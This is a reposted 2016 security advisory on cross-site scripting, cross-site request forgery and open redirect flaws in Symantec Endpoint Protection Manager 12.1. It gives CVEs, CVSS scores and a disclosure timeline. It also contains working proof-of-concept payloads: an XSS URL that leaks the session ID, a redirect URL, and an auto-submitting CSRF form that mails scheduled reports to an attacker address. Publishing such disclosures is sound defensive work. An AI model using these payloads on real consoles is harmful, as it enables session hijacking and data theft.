Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities


SUBMITTED BY: sahertian

DATE: June 30, 2016, 4:49 p.m.

FORMAT: Text only

SIZE: 6.1 kB

HITS: 686

  1. [+] Credits: John Page aka HYP3RLINX
  2. [+] Website: hyp3rlinx.altervista.org
  3. [+] Source:
  4. http://hyp3rlinx.altervista.org/advisories/SYMANTEC-SEPM-MULTIPLE-VULNS.txt
  5. [+] ISR: ApparitionSec
  6. Vendor:
  7. ================
  8. www.symantec.com
  9. Product:
  10. ===========
  11. SEPM
  12. Symantec Endpoint Protection Manager and client v12.1
  13. SEPM provides a centrally managed solution. It handles security policy
  14. enforcement, host integrity checking (Symantec Network Access Control only),
  15. and automated remediation over all clients. The policies functionality is
  16. the heart of the Symantec software. Clients connect to the server to get the
  17. latest policies, security settings, and software updates.
  18. Vulnerability Type(s):
  19. ======================
  20. Multiple Cross Site Scripting (XSS)
  21. Cross Site Request Forgeries (CSRF)
  22. Open Redirect
  23. CVE Reference(s):
  24. =================
  25. CVE-2016-3652 / XSS
  26. CVE-2016-3653 / CSRF
  27. CVE-2016-5304 / Open Redirect
  28. Vulnerability Details:
  29. =====================
  30. The management console for SEPM contains a number of security
  31. vulnerabilities that could be used by a lower-privileged user or by
  32. an unauthorized user to elevate privilege or gain access to unauthorized
  33. information on the management server. Exploitation attempts of
  34. these vulnerabilities requires access to the SEP Management console.
  35. References:
  36. ============
  37. https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160628_01
  38. Exploit code(s):
  39. ===============
  40. In this case XSS can bypass the "http-only" cookie protection because the
  41. SEPM application writes and stores the session ID within various
  42. javascript functions used by the application within the DOM thereby
  43. exposing them directly to the XSS attack.
  44. 1) createModalDialogFromURL
  45. 2) createWindowFromURL
  46. 3) createWindowFromForm
  47. 4) createIEWindowFromForm
  48. So all we need to do is alert(createModalDialogFromURL) anyone one of them
  49. (functions) an it will leak the session ID essentially throwing the
  50. HttpOnly secure cookie protection flag into the garbage.
  51. e.g.
  52. XSS POC Defeat http-only flag and access PHPSESSID:
  53. https://localhost:8445/Reporting/Admin/notificationpopup.php?New=1&Type=CR&height=alert%28createModalDialogFromURL%29#
  54. Open Redirect in external URL .php script:
  55. =========================================
  56. A reporting URL used to route generated reports externally to any
  57. authorized URL is susceptible to an open redirect vulnerability
  58. that could have allowed an authorized but less-privileged user to redirect
  59. an unsuspecting privileged user to an external URL to
  60. attempt further exploitation, e.g. phishing.
  61. If a victim clicks on a link supplied by an attacker
  62. e.g.
  63. https://localhost:8445/Reporting/common/externalurl.php?url=http://hyp3rlinx.altervista.org
  64. Cross Site Request Forgery (CSRF):
  65. ==================================
  66. Multiple Cross Site Request Forgery exists in couple of places within this
  67. version of SEPM below is an example of sending scheduled report to
  68. an remote attackers email, if current logged in user visits malicious
  69. webpage or clicks infected link etc...
  70. Symantec Reporting Admin CSRF POC:
  71. <form id="PWN" action="https://localhost:8445/Reporting/Reports/sr-save.php"
  72. method="POST" />
  73. <input type="hidden" name="ReportName" value="HELL" />
  74. <input type="hidden" name="Description" value="PWNED!" />
  75. <input type="hidden" name="DisableReportSchedule" value="on" />
  76. <input type="hidden" name="NewReport" value="Y" />
  77. <input type="hidden" name="reporttype" value="1" />
  78. <input type="hidden" name="FILTERNAME" value="Default" />
  79. <input type="hidden" name="runEvery" value="1" />
  80. <input type="hidden" name="repeat" value="weekly" />
  81. <input type="hidden" name="datesched1" value="02%2F10%2F2016" />
  82. <input type="hidden" name="datesched2" value="02%2F10%2F2016" />
  83. <input type="hidden" name="filHourSchedule" value="16" />
  84. <input type="hidden" name="Schedulehour" value="16" />
  85. <input type="hidden" name="filMinSchedule" value="56" />
  86. <input type="hidden" name="Scheduleminute" value="56" />
  87. <input type="hidden" name="sysadmin" value="off" />
  88. <input type="hidden" name="sendto" value="evil@abyss.com" />
  89. <input type="hidden" name="updatelastrun" value="0" />
  90. <input type="hidden" name="HISTORYCONFIG_IDX" value="" />
  91. <input type="hidden" name="ReportPrefix" value="Y" />
  92. <input type="hidden" name="report_idx" value="Y-0" />
  93. <script>document.getElementById('PWN').submit()</script>
  94. </form>
  95. Disclosure Timeline:
  96. ============================================
  97. Vendor Notification: Febuary 11, 2016
  98. Vendor Acknowledges Report: Febuary 12, 2016
  99. Vendor Releases Fix: June 28, 2016
  100. June 29, 2016 : Public Disclosure
  101. Exploitation Technique:
  102. =======================
  103. Remote
  104. Severity Level(s):
  105. ====================
  106. Cross Site Scripting
  107. Medium
  108. v2 6.8
  109. AV:A/AC:M/Au:S/C:C/I:C/A:N
  110. v3 6.7
  111. AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
  112. Cross Site Request Forgery
  113. High
  114. v2 7.0
  115. AV:A/AC:M/Au:M/C:C/I:C/A:C
  116. v3 7.1
  117. AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
  118. Open Redirect
  119. Medium
  120. v2 4.1
  121. AV:A/AC:L/Au:S/C:P/I:P/A:N
  122. v3 4.1
  123. AV:A/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
  124. [+] Disclaimer
  125. The information contained within this advisory is supplied "as-is" with no
  126. warranties or guarantees of fitness of use or otherwise.
  127. Permission is hereby granted for the redistribution of this advisory,
  128. provided that it is not altered except by reformatting it, and
  129. that due credit is given. Permission is explicitly given for insertion in
  130. vulnerability databases and similar, provided that due credit
  131. is given to the author. The author is not responsible for any misuse of the
  132. information contained herein and accepts no responsibility
  133. for any damage caused by the use or misuse of this information. The author
  134. prohibits any malicious use of security related information
  135. or exploits by the author or elsewhere.
  136. hyp3rlinx
  137. Source ex-db http://goo.gl/pI24pX
  138. Thank you :)

comments powered by Disqus